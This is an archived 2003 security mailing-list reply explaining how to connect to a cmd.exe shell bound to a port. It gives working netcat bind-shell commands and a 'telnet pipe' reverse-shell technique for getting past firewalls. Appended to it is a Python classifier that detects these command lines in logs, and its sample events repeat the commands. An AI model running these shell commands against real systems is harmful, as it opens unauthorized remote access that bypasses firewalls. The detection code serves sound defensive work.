Re: How does one connect to a shell (cmd.exe) bound to a port on a remote machine?
From: DownBload (downbload_at_hotmail.com)
Date: 11/08/03
- Previous message: Kelly Martin: "SecurityFocus new article announcement"
- Maybe in reply to: Mark G. Spencer: "How does one connect to a shell (cmd.exe) bound to a port on a remote machine?"
- Next in thread: Golden_Eternity: "RE: How does one connect to a shell (cmd.exe) bound to a port on a remote machine?"
Date: 8 Nov 2003 10:20:41 -0000
To: security-basics@securityfocus.com
In-Reply-To: <20031106153902.26988032.mspencer@evidentdata.com>
>From: "Mark G. Spencer" <mspencer@evidentdata.com>
>I've been looking at some perl scripts that purport to create cmd.exe shells bound to a tcp port on a remote machine. I'm curious, how would someone connect to these shells? The code looks very compact, I wouldn't imagine you could just http to the port bound with cmd.exe? Perhaps telnet? Is this how Code Red and Nimda were operating?
The best tool for such things is NetCat.
Just run it as 'nc.exe -l -v -p 31337 -e cmd.exe' and you will have a shell on TCP port 31337. When you want to connect to that host and port, use NetCat again, but now as 'nc.exe remote_host.com 31337' and you have a shell.
In some cases (like with firewalled machines) you can use the "telnet pipe" technique to bypass the firewall.
First run two instances of nc.exe on your machine, like this:
nc.exe -l -v -p 31337
nc.exe -l -v -p 31338
(each in a separate window)
Now on the remote machine do something like "telnet your_host.com 31337 | cmd.exe | telnet your_host.com 31338"
Write commands in the first window on your machine, and the output will be in the second window.
------------------------------------
DownBload / Illegal Instruction Labs
Security Research & Education
http://www.ii-labs.org
e-mail:downbload[at]hotmail.com
, ,
/| |\
\\.....// "Born under the lucky star magical,
|.\ /.| but on this earth generally tragical."
\\^//
o_o
`
Check our wargame: http://www.ii-labs.org/wargame/
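
From the defender's side, both patterns in the reply above leave recognizable command lines in process-creation or shell logs. The following is an added example, not part of the original post: a small classifier that flags them. The input format (one raw command-line string per event), the label names and the sample events are assumptions constructed for illustration.

```python
import re

SHELLS = {"cmd", "cmd.exe", "powershell.exe", "sh", "bash"}
NETCAT = {"nc", "nc.exe", "ncat", "ncat.exe", "netcat"}
RELAYS = NETCAT | {"telnet", "telnet.exe"}

def _base(token):
    """Lower-cased file name of a token, without quotes or directory."""
    return re.split(r"[\\/]", token.strip('"'))[-1].lower()

def classify(cmdline):
    """Return the set of finding labels (hypothetical names) for one command line."""
    findings = set()
    stages = [s.split() for s in cmdline.split("|") if s.strip()]
    names = [_base(s[0]) for s in stages]
    for toks, name in zip(stages, names):
        if name not in NETCAT:
            continue
        flags = "".join(t[1:] for t in toks[1:] if re.fullmatch(r"-[A-Za-z]+", t))
        # Program handed to -e: the token right after a flag group ending in "e".
        execd = {_base(toks[i + 1]) for i in range(1, len(toks) - 1)
                 if re.fullmatch(r"-[A-Za-z]*e", toks[i])}
        if execd & SHELLS:
            # With -l the shell is bound to a listening port, as in the post.
            findings.add("netcat-bind-shell" if "l" in flags else "netcat-exec-shell")
    # A shell whose stdin and stdout are both piped to network clients.
    for i in range(1, len(names) - 1):
        if names[i] in SHELLS and names[i - 1] in RELAYS and names[i + 1] in RELAYS:
            findings.add("shell-relay-pipe")
    return findings

# Constructed sample events (not from the original post's logs).
SAMPLE_EVENTS = [
    r"C:\tools\nc.exe -l -v -p 31337 -e cmd.exe",
    "nc.exe -lvp 31337 -e cmd.exe",
    "telnet your_host.com 31337 | cmd.exe | telnet your_host.com 31338",
    "nc.exe -l -v -p 31337",            # plain listener, no shell attached
    "telnet mail.example.com 25",       # ordinary client use
    "cmd.exe /c dir | findstr nc.exe",  # mentions nc.exe but does not run it
]

def scan(events):
    """Map each flagged command line to its sorted findings."""
    return {e: sorted(f) for e in events if (f := classify(e))}

if __name__ == "__main__":
    for event, labels in scan(SAMPLE_EVENTS).items():
        print(labels, event)
```

Matching on the file name alone misses renamed binaries, so a rule like this is best paired with network telemetry showing cmd.exe as the child of a process that holds a listening or outbound socket.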